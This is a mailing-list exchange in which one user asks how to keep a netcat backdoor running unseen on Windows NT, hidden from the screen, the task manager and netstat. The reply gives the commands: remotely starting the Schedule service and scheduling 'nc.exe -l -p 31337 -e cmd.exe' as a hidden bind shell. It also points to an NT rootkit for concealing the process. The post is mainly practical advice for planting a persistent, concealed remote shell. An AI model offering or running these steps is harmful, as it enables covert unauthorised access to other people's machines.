Vulnerability Development: Re: -= Unsek Tecnics =-

[Nelson Brito <nelson () SECUNET COM BR>]

sekure wrote:
> Hi Guy,
> I run nc ... to open ports (services how backdoors) in WinNT4.0+SP6 ... but
> while i'm using it stay with a cmd.exe running... :/
> How can i run nc.exe to open a port...without open a cmd.exe on a screen??
> I put it in "run" on registry and it open the cmd.exe yet ... :/
> And when i run nc -l -n -v -p port_num -e cmd.exe it lock my cmd.exe
> screen...!
Try to use "Schedule Service" to do this, just like:
sc \\MACHINE query schedule -> to know if schedule was started
sc \\MACHINE start schedule -> to start schedule, you'll need Admin status
at \\MACHINE 01A path\to\nc.exe -l -p 31337 -e cmd.exe  -> to execute nc.exe without interactive screen

I wrote a perl script to do this automatic, but it's only for my own Tests. Anyway, it's so easy to do that you could 
do your own perl script. ;)

> How to run it without lock and appear cmd.exe on screen ??
>
> And I note too, that while this is running...it create a process in
> taskmanager ...!!!
> Anybody know a mode of put it in high ??
Use some NTRK's tools to do this. In NTRK you'll see a lot of tools, actualy one, to do this. Try "PVIEWER.EXE". 
Notice: you'll need Admin status. If
you do not have, forget it.

> And it appear to in netstat!! How to put it in high ??
> A high that i sponken.... can be one r00t kit to Win NT!!!
> Anybody know ??
> How as a knark to linux!! :))
Did you test "ntrootkit"? If you didn't, go to: http://www.rootkit.com/

> Thkz for all!
> Regards,
> [ ]'s
Sem mais,
--
Nelson Brito
"Windows NT can also be protected from nmap OS detection scans thanks
to *Nelson Brito* ..."
              Trecho do livro "Hack Proofing your Network", página 93